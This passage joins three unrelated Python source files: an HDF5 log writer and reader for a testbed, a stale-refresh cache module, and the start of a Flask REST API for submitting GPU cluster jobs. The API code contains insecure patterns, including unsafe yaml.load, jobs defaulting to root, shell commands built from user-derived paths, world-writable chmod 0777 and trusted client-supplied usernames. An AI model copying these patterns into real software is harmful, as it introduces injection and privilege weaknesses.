self.data_grp["current"].resize((self.data_pos if self._write_current else 0,))
self.gpio_grp["time"].resize((self.gpio_pos if self._write_gpio else 0,))
self.gpio_grp["value"].resize((self.gpio_pos if self._write_gpio else 0,))
self.sysutil_grp["time"].resize((self.sysutil_pos,))
self.sysutil_grp["cpu"].resize((self.sysutil_pos,))
self.sysutil_grp["ram"].resize((self.sysutil_pos, 2))
self.sysutil_grp["io"].resize((self.sysutil_pos, 4))
self.sysutil_grp["net"].resize((self.sysutil_pos, 2))
self.uart_grp["time"].resize((self.uart_pos,))
self.uart_grp["message"].resize((self.uart_pos,))
self.dmesg_grp["time"].resize((self.dmesg_pos,))
self.dmesg_grp["message"].resize((self.dmesg_pos,))
self.xcpt_grp["time"].resize((self.xcpt_pos,))
self.xcpt_grp["message"].resize((self.xcpt_pos,))
self.xcpt_grp["value"].resize((self.xcpt_pos,))
self.timesync_grp["time"].resize((self.timesync_pos,))
self.timesync_grp["value"].resize((self.timesync_pos, 3))
if self.dmesg_mon_t is not None:
logger.info(f"[LogWriter] terminate Dmesg-Monitor ({self.dmesg_grp['time'].shape[0]} entries)")
self.dmesg_mon_t = None
if self.ptp4l_mon_t is not None:
logger.info(f"[LogWriter] terminate PTP4L-Monitor ({self.timesync_grp['time'].shape[0]} entries)")
self.ptp4l_mon_t = None
if self.uart_mon_t is not None:
logger.info(f"[LogWriter] terminate UART-Monitor ({self.uart_grp['time'].shape[0]} entries)")
self.uart_mon_t = None
runtime = round(self.data_grp['time'].shape[0] // self.samplerate_sps, 1)
logger.info(f"[LogWriter] flushing hdf5 file ({runtime} s iv-data, {self.gpio_grp['time'].shape[0]} gpio-events)")
self._h5file.flush()
logger.info("[LogWriter] closing hdf5 file")
self._h5file.close()
def write_buffer(self, buffer: DataBuffer) -> NoReturn:
"""Writes data from buffer to file.
Args:
buffer (DataBuffer): Buffer containing IV data
"""
# First, we have to resize the corresponding datasets
data_end_pos = self.data_pos + len(buffer)
data_length = self.data_grp["time"].shape[0]
if data_end_pos >= data_length:
data_length += self.data_inc
self.data_grp["time"].resize((data_length,))
self.data_grp["voltage"].resize((data_length if self._write_voltage else 0,))
self.data_grp["current"].resize((data_length if self._write_current else 0,))
if self._write_voltage:
self.data_grp["voltage"][self.data_pos:data_end_pos] = buffer.voltage
if self._write_current:
self.data_grp["current"][self.data_pos:data_end_pos] = buffer.current
if self._write_voltage or self._write_current:
self.data_grp["time"][self.data_pos:data_end_pos] = (
self.buffer_timeseries + buffer.timestamp_ns
)
self.data_pos = data_end_pos
len_edges = len(buffer.gpio_edges)
if self._write_gpio and (len_edges > 0):
gpio_new_pos = self.gpio_pos + len_edges
data_length = self.gpio_grp["time"].shape[0]
if gpio_new_pos >= data_length:
data_length += self.gpio_inc
self.gpio_grp["time"].resize((data_length,))
self.gpio_grp["value"].resize((data_length,))
self.gpio_grp["time"][self.gpio_pos:gpio_new_pos] = buffer.gpio_edges.timestamps_ns
self.gpio_grp["value"][self.gpio_pos:gpio_new_pos] = buffer.gpio_edges.values
self.gpio_pos = gpio_new_pos
self.log_sys_stats()
def write_exception(self, exception: ExceptionRecord) -> NoReturn:
""" Writes an exception to the hdf5 file.
TODO: use this fn to log exceptions, redirect logger.error() ?
TODO: there is a concrete ShepherdIOException(Exception)
Args:
exception (ExceptionRecord): The exception to be logged
"""
if self.xcpt_pos >= self.xcpt_grp["time"].shape[0]:
data_length = self.xcpt_grp["time"].shape[0] + self.xcpt_inc
self.xcpt_grp["time"].resize((data_length,))
self.xcpt_grp["value"].resize((data_length,))
self.xcpt_grp["message"].resize((data_length,))
self.xcpt_grp["time"][self.xcpt_pos] = exception.timestamp
self.xcpt_grp["value"][self.xcpt_pos] = exception.value
self.xcpt_grp["message"][self.xcpt_pos] = exception.message
self.xcpt_pos += 1
def log_sys_stats(self) -> NoReturn:
""" captures state of system in a fixed intervall
https://psutil.readthedocs.io/en/latest/#cpu
:return: none
"""
ts_now_ns = int(time.time() * (10 ** 9))
if ts_now_ns >= self.sys_log_next_ns:
data_length = self.sysutil_grp["time"].shape[0]
if self.sysutil_pos >= data_length:
# self._h5file.flush()
# logger.info(f"flushed output-file @ {data_length} s")
data_length += self.sysutil_inc
self.sysutil_grp["time"].resize((data_length,))
self.sysutil_grp["cpu"].resize((data_length,))
self.sysutil_grp["ram"].resize((data_length, 2))
self.sysutil_grp["io"].resize((data_length, 4))
self.sysutil_grp["net"].resize((data_length, 2))
self.sys_log_next_ns += self.sys_log_intervall_ns
if self.sys_log_next_ns < ts_now_ns:
self.sys_log_next_ns = int(time.time()) * (10 ** 9)
self.sysutil_grp["time"][self.sysutil_pos] = ts_now_ns
self.sysutil_grp["cpu"][self.sysutil_pos] = int(round(psutil.cpu_percent(0)))
mem_stat = psutil.virtual_memory()[0:3]
self.sysutil_grp["ram"][self.sysutil_pos, 0:2] = [int(100 * mem_stat[1] / mem_stat[0]), int(mem_stat[2])]
sysutil_io_now = np.array(psutil.disk_io_counters()[0:4])
self.sysutil_grp["io"][self.sysutil_pos, :] = sysutil_io_now - self.sysutil_io_last
self.sysutil_io_last = sysutil_io_now
sysutil_nw_now = np.array(psutil.net_io_counters()[0:2])
self.sysutil_grp["net"][self.sysutil_pos, :] = sysutil_nw_now - self.sysutil_nw_last
self.sysutil_nw_last = sysutil_nw_now
self.sysutil_pos += 1
# TODO: add temp, not working: https://psutil.readthedocs.io/en/latest/#psutil.sensors_temperatures
def start_monitors(self, uart_baudrate: int = 0) -> NoReturn:
self.dmesg_mon_t = threading.Thread(target=self.monitor_dmesg, daemon=True)
self.dmesg_mon_t.start()
self.ptp4l_mon_t = threading.Thread(target=self.monitor_ptp4l, daemon=True)
self.ptp4l_mon_t.start()
self.uart_mon_t = threading.Thread(target=self.monitor_uart, args=(uart_baudrate,), daemon=True)
self.uart_mon_t.start()
def monitor_uart(self, baudrate: int, poll_intervall: float = 0.01) -> NoReturn:
# TODO: TEST - Not final, goal: raw bytes in hdf5
# - uart is bytes-type -> storing in hdf5 is hard, tried 'S' and opaque-type -> failed with errors
# - converting is producing ValueError on certain chars, errors="backslashreplace" does not help
# TODO: evaluate https://pyserial.readthedocs.io/en/latest/pyserial_api.html#serial.to_bytes
if not isinstance(baudrate, int) or baudrate == 0:
return
global monitors_end
uart_path = '/dev/ttyO1'
logger.debug(f"Will start UART-Monitor for target on '{uart_path}' @ {baudrate} baud")
tevent = threading.Event()
try:
# open serial as non-exclusive
with serial.Serial(uart_path, baudrate, timeout=0) as uart:
while True:
if monitors_end.is_set():
break
if uart.in_waiting > 0:
output = uart.read(uart.in_waiting).decode("ascii", errors="replace").replace('\x00', '')
if len(output) > 0:
data_length = self.uart_grp["time"].shape[0]
if self.sysutil_pos >= data_length:
data_length += self.uart_inc
self.uart_grp["time"].resize((data_length,))
self.uart_grp["message"].resize((data_length,))
self.uart_grp["time"][self.uart_pos] = int(time.time()) * (10 ** 9)
self.uart_grp["message"][self.uart_pos] = output # np.void(uart_rx)
self.uart_pos += 1
tevent.wait(poll_intervall) # rate limiter
except ValueError as e:
logger.error(
f"[UartMonitor] PySerial ValueError '{e}' - couldn't configure serial-port '{uart_path}' with baudrate={baudrate} -> will skip logging")
except serial.SerialException as e:
logger.error(
f"[UartMonitor] pySerial SerialException '{e} - Couldn't open Serial-Port '{uart_path}' to target -> will skip logging")
logger.debug(f"[UartMonitor] ended itself")
def monitor_dmesg(self, backlog: int = 40, poll_intervall: float = 0.1):
# var1: ['dmesg', '--follow'] -> not enough control
global monitors_end
cmd_dmesg = ['sudo', 'journalctl', '--dmesg', '--follow', f'--lines={backlog}', '--output=short-precise']
proc_dmesg = subprocess.Popen(cmd_dmesg, stdout=subprocess.PIPE, universal_newlines=True)
tevent = threading.Event()
for line in iter(proc_dmesg.stdout.readline, ""):
if monitors_end.is_set():
break
line = str(line).strip()[:128]
try:
data_length = self.dmesg_grp["time"].shape[0]
if self.dmesg_pos >= data_length:
data_length += self.dmesg_inc
self.dmesg_grp["time"].resize((data_length,))
self.dmesg_grp["message"].resize((data_length,))
self.dmesg_grp["time"][self.dmesg_pos] = int(time.time() * (10 ** 9))
self.dmesg_grp["message"][self.dmesg_pos] = line
except OSError:
logger.error(f"[DmesgMonitor] Caught a Write Error for Line: [{type(line)}] {line}")
tevent.wait(poll_intervall) # rate limiter
logger.debug(f"[DmesgMonitor] ended itself")
def monitor_ptp4l(self, poll_intervall: float = 0.25):
# example: Feb 16 10:58:37 sheep1 ptp4l[378]: [821.629] master offset -4426 s2 freq +285889 path delay 12484
global monitors_end
cmd_ptp4l = ['sudo', 'journalctl', '--unit=ptp4l', '--follow', '--lines=1', '--output=short-precise'] # for client
proc_ptp4l = subprocess.Popen(cmd_ptp4l, stdout=subprocess.PIPE, universal_newlines=True)
tevent = threading.Event()
for line in iter(proc_ptp4l.stdout.readline, ""):
if monitors_end:
break
try:
words = str(line).split()
i_start = words.index("offset")
values = [int(words[i_start + 1]), int(words[i_start + 4]), int(words[i_start + 7])]
except ValueError:
continue
try:
data_length = self.timesync_grp["time"].shape[0]
if self.timesync_pos > data_length:
data_length += self.timesync_inc
self.timesync_grp["time"].resize((data_length,))
self.timesync_grp["values"].resize((data_length, 3))
self.timesync_grp["time"][self.timesync_pos] = int(time.time() * (10 ** 9))
self.timesync_grp["values"][self.timesync_pos, :] = values[0:3]
except OSError:
logger.error(f"[PTP4lMonitor] Caught a Write Error for Line: [{type(line)}] {line}")
tevent.wait(poll_intervall) # rate limiter
logger.debug(f"[PTP4lMonitor] ended itself")
def __setitem__(self, key, item):
"""Offer a convenient interface to store any relevant key-value data"""
return self._h5file.attrs.__setitem__(key, item)
class LogReader(object):
""" Sequentially Reads data from HDF5 file.
Args:
store_path (Path): Path of hdf5 file containing IV data
samples_per_buffer (int): Number of IV samples per buffer
"""
def __init__(self,
store_path: Path,
samples_per_buffer: int = 10_000,
samplerate_sps: int = 100_000):
self.store_path = store_path
self.samples_per_buffer = samples_per_buffer
self.samplerate_sps = samplerate_sps
def __enter__(self):
self._h5file = h5py.File(self.store_path, "r")
self.ds_voltage = self._h5file["data"]["voltage"]
self.ds_current = self._h5file["data"]["current"]
runtime = round(self.ds_voltage.shape[0] / self.samplerate_sps, 1)
logger.info(f"Reading data from '{self.store_path}', contains {runtime} s")
return self
def __exit__(self, *exc):
self._h5file.close()
def read_buffers(self, start: int = 0, end: int = None, verbose: bool = False):
"""Reads the specified range of buffers from the hdf5 file.
Args:
:param start: (int): Index of first buffer to be read
:param end: (int): Index of last buffer to be read
:param verbose: chatter-prevention, performance-critical computation saver
Yields:
Buffers between start and end
"""
if end is None:
end = int(
self._h5file["data"]["time"].shape[0] / self.samples_per_buffer
)
logger.debug(f"Reading blocks from { start } to { end } from source-file")
for i in range(start, end):
if verbose:
ts_start = time.time()
idx_start = i * self.samples_per_buffer
idx_end = idx_start + self.samples_per_buffer
db = DataBuffer(
voltage=self.ds_voltage[idx_start:idx_end],
current=self.ds_current[idx_start:idx_end],
)
if verbose:
logger.debug(
f"Reading datablock with {self.samples_per_buffer} samples "
f"from file took { round(1e3 * (time.time()-ts_start), 2) } ms"
)
yield db
def get_calibration_data(self) -> CalibrationData:
"""Reads calibration data from hdf5 file.
Returns:
Calibration data as CalibrationData object
"""
cal = CalibrationData.from_default()
for channel, parameter in product(["current", "voltage"], cal_parameter_list):
cal_channel = cal_channel_harvest_dict[channel]
cal.data["harvesting"][cal_channel][parameter] = self._h5file["data"][channel].attrs[parameter]
return CalibrationData(cal)
def get_window_samples(self) -> int:
if "window_samples" in self._h5file["data"].attrs:
return self._h5file["data"].attrs["window_samples"]
return 0
|
cachy.py
|
import cachetools, cachetools.func, time, threading, traceback
from flaskthreads import AppContextThread
from flaskthreads.thread_helpers import has_app_context, _app_ctx_stack, APP_CONTEXT_ERROR
from flask import g
import concurrent.futures
from concurrent.futures.thread import _threads_queues
import functools
def get_context(): return _app_ctx_stack.top if has_app_context() else None
class TPEMod(concurrent.futures.ThreadPoolExecutor):
def submit(self, fn, *a, **kw):
context = get_context()
def fnwrapper(*aa, **akw):
if context:
with context:
return fn(*aa, **akw)
else:
return fn(*aa, **akw)
res = super().submit(fnwrapper, *a, **kw)
_threads_queues.clear() # hack to stop joining from preventing ctrl-c
return res
tpe = TPEMod(max_workers=256)
class AppContextThreadMod(threading.Thread):
"""Implements Thread with flask AppContext."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.app_ctx = get_context()
def run(self):
if self.app_ctx:
with self.app_ctx:
super().run()
else:
super().run()
Thread = AppContextThreadMod
# hashkey = cachetools.keys.hashkey
tm = time.monotonic
empty = 0
idle = 1
dispatching = 2
import time, random
ts = time.sleep
rr = random.random
def tsr():ts(rr()*.1)
# buffer that refreshes in the bkgnd
class StaleBuffer:
# f returns what we want to serve
def __init__(self, f, ttr=5, ttl=10): # time to refresh / time to live
self.a = None
self.ts = tm()
self.l = threading.Lock()
self.state = empty
self.f = f
self.ttr = ttr
self.ttl = ttl
assert ttl>ttr
def refresh_threaded(self):
# tsr()
try:
r = self.f()
except Exception as e:
traceback.print_exc()
with self.l:
self.state = idle
else:
with self.l:
self.state = idle
self.a = r
self.ts = tm()
def dispatch_refresh(self):
tpe.submit(self.refresh_threaded)
# t = Thread(target=self.refresh_threaded, daemon=True)
# t.start()
def get(self):
# ttl = self.ttl
# ttr = self.ttr
# f = self.f
# last = self.ts
# now = tm()
# past = now - last
past = tm() - self.ts
state = self.state
# we couldn't afford expensive locking everytime, so
if state==idle and past < self.ttr:
return self.a
elif state==dispatching:
return self.a
else:
with self.l:
# cache is empty
if state == empty:
self.a = self.f()
self.ts = tm()
self.state = idle
# cache is not empty, no dispatch on the way
elif state == idle:
# is cache fresh?
if past > self.ttl:
# too old.
self.a = self.f()
self.ts = tm()
elif past > self.ttr:
# kinda old
self.state = dispatching
self.dispatch_refresh()
# # cache is fresh
# else:
# pass
# elif self.state == 'dispatching':
# pass
# else:
# pass
return self.a
tmg = tm()
def update_tmg():
global tmg
while 1:
tmg = tm()
time.sleep(0.2)
tpe.submit(update_tmg)
def StaleBufferFunctional(f, ttr=10, ttl=1800):
global tmg
a = None
tspttr = 0
tspttl = 0
l = threading.Lock()
state = empty
def update_t():
nonlocal tspttl,tspttr
tspttr = tmg+ttr
tspttl = tmg+ttl
def refresh_threaded():
nonlocal a,state
# tsr()
try:
res = f()
except Exception as e:
traceback.print_exc()
with l:
state = idle
else:
with l:
state = idle
a = res
update_t()
def dispatch_refresh():
tpe.submit(refresh_threaded)
def get():
nonlocal a,state,tspttl,tspttr
# past = tm() - ts
# we couldn't afford expensive locking everytime, so
if state==idle and tmg < tspttr:
# return a
pass
elif state==dispatching:
# return a
pass
else:
with l:
# cache is empty
if state == empty:
a = f()
update_t()
state = idle
# cache is not empty, no dispatch on the way
elif state == idle:
# is cache fresh?
if tmg > tspttl:
# too old.
a = f()
update_t()
elif tmg > tspttr:
# kinda old
state = dispatching
dispatch_refresh()
# # cache is fresh
# else:
# pass
# elif self.state == 'dispatching':
# pass
# else:
# pass
return a
return get
if 1 and __name__ == '__main__':
from commons_static import timethis
def by33():return random.random()+random.random()*111
sb = StaleBuffer(by33, 15, 1000)
sbf = StaleBufferFunctional(by33)
timethis('$by33()')
timethis('$sb.get()')
timethis('$sbf()')
if 0 and __name__ == '__main__':
def kg():
j = 1
def k():
nonlocal j
j+=1
time.sleep(1)
return j
return k
sb = StaleBuffer(kg(), ttr=1, ttl=6)
sbf = StaleBufferFunctional(kg(), ttr=1, ttl=6)
for i in range(10):
print('old',sb.get(), sb.state)
print('new',sbf())
time.sleep(0.3)
print('stalebuf test end')
def stale_cache_old(ttr=3, ttl=6, maxsize=128):
def stale_cache_wrapper(f):
@cachetools.func.lru_cache(maxsize=maxsize)
def get_stale_buffer(*a, **kw):
def sbw():
return f(*a, **kw)
sb = StaleBuffer(sbw, ttr=ttr, ttl=ttl)
return sb
def stale_cache_inner(*a, **kw):
sb = get_stale_buffer(*a, **kw)
return sb.get()
return stale_cache_inner
return stale_cache_wrapper
def stale_cache(ttr=3, ttl=6, maxsize=128):
def stale_cache_wrapped(f):
@functools.lru_cache(maxsize=maxsize)
def get_stale_buffer(*a, **kw):
return StaleBufferFunctional(
lambda:f(*a, **kw),
ttr=ttr,
ttl=ttl,
)
def stale_cache_inner(*a, **kw):
return get_stale_buffer(*a, **kw)()
return stale_cache_inner
return stale_cache_wrapped
if 1 and __name__ == '__main__':
from commons_static import timethis
print('00000'*5)
@stale_cache_old()
def by33():return random.random()+random.random()*111
@stale_cache()
def by34():return random.random()+random.random()*111
timethis('$by33()')
timethis('$by34()')
if 0 and __name__ == '__main__':
def return3():
return 31234019374194
future = tpe.submit(return3)
print(future.result())
j = 1
k = 1
@stale_cache(ttr=1.5)
def a(i):
global j
j+=1
time.sleep(.5)
return i*j
@stale_cache2(ttr=1.5)
def a2(i):
global j
j+=1
time.sleep(.5)
return i*j
@stale_cache(ttr=3)
def b(n):
global k
k+=1
time.sleep(.7)
return k*n
@stale_cache2(ttr=3)
def b2(n):
global k
k+=1
time.sleep(.7)
return k*n
for i in range(20):
print('old',a(3.5), b(6))
print('new',a2(3.5), b2(6))
time.sleep(0.4)
|
dlwsrestapi.py
|
#!/usr/bin/env python3
import sys
import json
import os
import base64
import yaml
import uuid
import logging
from logging.config import dictConfig
import time
import traceback
import threading
from flask import Flask, Response
from flask_restful import reqparse, Api, Resource
from flask import request, jsonify
import prometheus_client
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../utils"))
import JobRestAPIUtils
from authorization import ResourceType, Permission, AuthorizationManager, ACLManager
from config import config, global_vars
import authorization
from DataHandler import DataHandler
CONTENT_TYPE_LATEST = str("text/plain; version=0.0.4; charset=utf-8")
def base64encode(str_val):
return base64.b64encode(str_val.encode("utf-8")).decode("utf-8")
def base64decode(str_val):
return base64.b64decode(str_val.encode("utf-8")).decode("utf-8")
dir_path = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(dir_path, 'logging.yaml'), 'r') as f:
logging_config = yaml.load(f)
dictConfig(logging_config)
logger = logging.getLogger('restfulapi')
app = Flask(__name__)
api = Api(app)
verbose = True
logger.info( "------------------- Restful API started ------------------------------------- ")
logger.info("%s", config)
if "initAdminAccess" not in global_vars or not global_vars["initAdminAccess"]:
logger.info("===========Init Admin Access===============")
global_vars["initAdminAccess"] = True
logger.info('setting admin access!')
ACLManager.UpdateAce("Administrator", AuthorizationManager.GetResourceAclPath("", ResourceType.Cluster), Permission.Admin, 0)
logger.info('admin access given!')
def _stacktraces():
code = []
for threadId, stack in list(sys._current_frames().items()):
code.append("\n# ThreadID: %s" % threadId)
for filename, lineno, name, line in traceback.extract_stack(stack):
code.append('File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
code.append(" %s" % (line.strip()))
for line in code:
print("_stacktrace: " + line)
def _WorkerThreadFunc():
while True:
_stacktraces()
time.sleep(60)
#workerThread = threading.Thread(target=_WorkerThreadFunc, args=())
#workerThread.daemon = True
#workerThread.start()
def istrue(value):
if isinstance(value, bool):
return value
elif isinstance(value, str):
return value.lower()[0]=='y'
else:
return bool(value)
def tolist(value):
if isinstance( value, str):
if len(value)>0:
return [value]
else:
return []
else:
return value
def remove_creds(job):
job_params = job.get("jobParams", None)
if job_params is None:
return
plugins = job_params.get("plugins", None)
if plugins is None or not isinstance(plugins, dict):
return
blobfuse = plugins.get("blobfuse", None)
if blobfuse is not None and isinstance(blobfuse, list):
for bf in blobfuse:
bf.pop("accountName", None)
bf.pop("accountKey", None)
image_pull = plugins.get("imagePull", None)
if image_pull is not None and isinstance(image_pull, list):
for i_p in image_pull:
i_p.pop("username", None)
i_p.pop("password", None)
def generate_response(result):
resp = jsonify(result)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
class SubmitJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobName')
parser.add_argument('resourcegpu')
parser.add_argument('gpuType')
parser.add_argument('workPath')
parser.add_argument('dataPath')
parser.add_argument('jobPath')
parser.add_argument('image')
parser.add_argument('cmd')
parser.add_argument('logDir')
parser.add_argument('interactivePort')
parser.add_argument('userName')
parser.add_argument('vcName')
parser.add_argument('preemptionAllowed')
parser.add_argument('userId')
parser.add_argument('runningasroot')
parser.add_argument('containerUserId')
parser.add_argument('familyToken')
parser.add_argument('isParent')
parser.add_argument('jobType')
parser.add_argument('nodeSelector')
parser.add_argument('jobtrainingtype')
parser.add_argument('numpsworker')
parser.add_argument('nummpiworker')
parser.add_argument('jobPriority')
args = parser.parse_args()
params = {}
ret = {}
for key, value in args.items():
if value is not None:
params[key] = value
if args["jobName"] is None or len(args["jobName"].strip()) == 0:
ret["error"] = "job name cannot be empty"
elif args["vcName"] is None or len(args["vcName"].strip()) == 0:
ret["error"] = "vc name cannot be empty"
elif args["resourcegpu"] is None or len(args["resourcegpu"].strip()) == 0:
ret["error"] = "Number of GPU cannot be empty"
elif args["gpuType"] is None or len(args["gpuType"].strip()) == 0:
ret["error"] = "GPU Type cannot be empty"
elif args["dataPath"] is None or len(args["dataPath"].strip()) == 0:
ret["error"] = "datapath cannot be empty"
elif args["image"] is None or len(args["image"].strip()) == 0:
ret["error"] = "docker image cannot be empty"
elif args["jobType"] is None or len(args["jobType"].strip()) == 0:
ret["error"] = "jobType cannot be empty"
else:
params["jobName"] = args["jobName"]
params["vcName"] = args["vcName"]
params["resourcegpu"] = args["resourcegpu"]
params["gpuType"] = args["gpuType"]
params["workPath"] = args["workPath"]
params["dataPath"] = args["dataPath"]
params["image"] = args["image"]
params["cmd"] = args["cmd"]
params["jobType"] = args["jobType"]
params["preemptionAllowed"] = args["preemptionAllowed"]
params["jobtrainingtype"] = args["jobtrainingtype"]
if args["jobtrainingtype"] == "PSDistJob":
params["numps"] = 1
params["numpsworker"] = args["numpsworker"]
if args["jobtrainingtype"] == "MPIDistJob":
params["nummpiworker"] = args["nummpiworker"]
if args["jobPath"] is not None and len(args["jobPath"].strip()) > 0:
params["jobPath"] = args["jobPath"]
if args["logDir"] is not None and len(args["logDir"].strip()) > 0:
params["logDir"] = args["logDir"]
if args["userId"] is not None and len(args["userId"].strip()) > 0:
params["userId"] = args["userId"]
else:
# !! note: if userId is not provided, the container will be running as root. There shouldn't be any security concern since all the resources in docker container should be user's own property. Also, we plan to allow user to choose "run as root".
params["userId"] = "0"
if args["nodeSelector"] is not None and len(args["nodeSelector"].strip()) > 0:
params["nodeSelector"] = {args["nodeSelector"]:"active"}
if args["interactivePort"] is not None and len(args["interactivePort"].strip()) > 0:
params["interactivePort"] = args["interactivePort"]
if args["containerUserId"] is not None and len(args["containerUserId"].strip()) > 0:
params["containerUserId"] = args["containerUserId"]
else:
params["containerUserId"] = params["userId"]
if args["userName"] is not None and len(args["userName"].strip()) > 0:
params["userName"] = args["userName"]
else:
params["userName"] = "default"
if args["familyToken"] is not None and len(args["familyToken"].strip()) > 0:
params["familyToken"] = args["familyToken"]
else:
params["familyToken"] = str(uuid.uuid4())
if args["isParent"] is not None and len(args["isParent"].strip()) > 0:
params["isParent"] = args["isParent"]
else:
params["isParent"] = "1"
if args["jobPriority"] is not None and len(args["jobPriority"].strip()) > 0:
params["jobPriority"] = args["jobPriority"]
params["mountpoints"] = []
addcmd = ""
if "mounthomefolder" in config and istrue(config["mounthomefolder"]) and "storage-mount-path" in config:
alias = JobRestAPIUtils.getAlias(params["userName"])
params["mountpoints"].append({"name":"homeholder","containerPath":os.path.join("/home", alias),"hostPath":os.path.join(config["storage-mount-path"], "work", alias)})
if "mountpoints" in config and "storage-mount-path" in config:
# see link_fileshares in deploy.py
for k, v in config["mountpoints"].items():
if "mountpoints" in v:
for basename in tolist(v["mountpoints"]):
if basename!="" and basename not in config["default-storage-folders"] and basename in config["deploymounts"]:
hostBase = os.path.join(config["storage-mount-path"], basename[1:]) if os.path.isabs(basename) else os.path.join(config["storage-mount-path"], basename)
basealias = basename[1:] if os.path.isabs(basename) else basename
containerBase = os.path.join("/", basename)
alias = JobRestAPIUtils.getAlias(params["userName"])
shares = [alias]
if "publicshare" in v:
if "all" in v["publicshare"]:
shares += (tolist(v["publicshare"]["all"]))
if basename in v["publicshare"]:
shares += (tolist(v["publicshare"][basename]))
for oneshare in shares:
hostPath = os.path.join(hostBase, oneshare)
containerPath = os.path.join(containerBase, oneshare)
if v["type"]=="emptyDir":
params["mountpoints"].append({"name":basealias+"-"+oneshare,
"containerPath": containerPath,
"hostPath": "/emptydir",
"emptydir": "yes" })
else:
params["mountpoints"].append({"name":basealias+"-"+oneshare,
"containerPath": containerPath,
"hostPath": hostPath })
if False and "type" in v and v["type"]!="local" and v["type"]!="localHDD":
# This part is disabled, see if False above
# This is a shared drive, we can try to create it, and enable the write permission
if not os.path.exists(hostPath):
cmd = "sudo mkdir -m 0777 -p %s; " % hostPath
os.system( cmd )
logger.info( cmd )
if oneshare==alias:
cmd = "sudo chown %s:%s %s; " % (params["containerUserId"], "500000513", hostPath )
os.system(cmd )
logger.info( cmd )
addcmd += "chmod 0777 %s ; " % containerPath
if oneshare==alias:
addcmd += "chown %s:%s %s ; " % ( params["userId"], "500000513", containerPath )
if verbose and len(params["mountpoints"]) > 0:
logger.info("Mount path for job %s", params )
for mounts in params["mountpoints"]:
logger.info( "Share %s, mount %s at %s", mounts["name"], mounts["hostPath"], mounts["containerPath"])
if len(addcmd) > 0:
params["cmd"] = addcmd + params["cmd"]
output = JobRestAPIUtils.SubmitJob(json.dumps(params))
if "jobId" in output:
ret["jobId"] = output["jobId"]
else:
if "error" in output:
ret["error"] = "Cannot create job!" + output["error"]
else:
ret["error"] = "Cannot create job!"
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(SubmitJob, '/SubmitJob')
class PostJob(Resource):
def post(self):
params = request.get_json(force=True)
logger.info("Post Job")
logger.info(params)
ret = {}
output = JobRestAPIUtils.SubmitJob(json.dumps(params))
if "jobId" in output:
ret["jobId"] = output["jobId"]
else:
if "error" in output:
ret["error"] = "Cannot create job!" + output["error"]
else:
ret["error"] = "Cannot create job!"
logger.info("Submit job through restapi, output is %s, ret is %s", output, ret)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(PostJob, '/PostJob')
# shows a list of all todos, and lets you POST to add new tasks
class ListJobs(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('num')
parser.add_argument('vcName')
parser.add_argument('jobOwner')
args = parser.parse_args()
num = None
if args["num"] is not None:
try:
num = int(args["num"])
except:
pass
jobs = JobRestAPIUtils.GetJobList(args["userName"], args["vcName"], args["jobOwner"], num)
jobList = []
queuedJobs = []
runningJobs = []
finishedJobs = []
visualizationJobs = []
for job in jobs:
job.pop("jobDescriptionPath",None)
job.pop("jobDescription",None)
job["jobParams"] = json.loads(base64decode(job["jobParams"]))
if "endpoints" in job and job["endpoints"] is not None and len(job["endpoints"].strip()) > 0:
job["endpoints"] = json.loads(job["endpoints"])
if "jobStatusDetail" in job and job["jobStatusDetail"] is not None and len(job["jobStatusDetail"].strip()) > 0:
try:
s = job["jobStatusDetail"]
s = base64decode(s)
s = json.loads(s)
job["jobStatusDetail"] = s
except Exception as e:
job["jobStatusDetail"] = s
pass
# Remove credentials
remove_creds(job)
if job["jobStatus"] == "running":
if job["jobType"] == "training":
runningJobs.append(job)
elif job["jobType"] == "visualization":
visualizationJobs.append(job)
elif job["jobStatus"] == "queued" or job["jobStatus"] == "scheduling" or job["jobStatus"] == "unapproved":
queuedJobs.append(job)
else:
finishedJobs.append(job)
ret = {}
ret["queuedJobs"] = queuedJobs
ret["runningJobs"] = runningJobs
ret["finishedJobs"] = finishedJobs
ret["visualizationJobs"] = visualizationJobs
ret["meta"] = {"queuedJobs": len(queuedJobs),"runningJobs": len(runningJobs),"finishedJobs": len(finishedJobs),"visualizationJobs": len(visualizationJobs)}
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ListJobs, '/ListJobs')
# shows a list of all jobs, and lets you POST to add new tasks
class ListJobsV2(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('num')
parser.add_argument('vcName')
parser.add_argument('jobOwner')
args = parser.parse_args()
num = None
if args["num"] is not None:
try:
num = int(args["num"])
except:
pass
jobs = JobRestAPIUtils.GetJobListV2(args["userName"], args["vcName"], args["jobOwner"], num)
for _, joblist in list(jobs.items()):
if isinstance(joblist, list):
for job in joblist:
remove_creds(job)
resp = generate_response(jobs)
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ListJobsV2, '/ListJobsV2')
class KillJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
result = JobRestAPIUtils.KillJob(userName, jobId)
ret = {}
if result:
# NOTE "Success" prefix is used in reaper, please also update reaper code
# if need to change it.
ret["result"] = "Success, the job is scheduled to be terminated."
else:
ret["result"] = "Cannot Kill the job. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(KillJob, '/KillJob')
class PauseJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
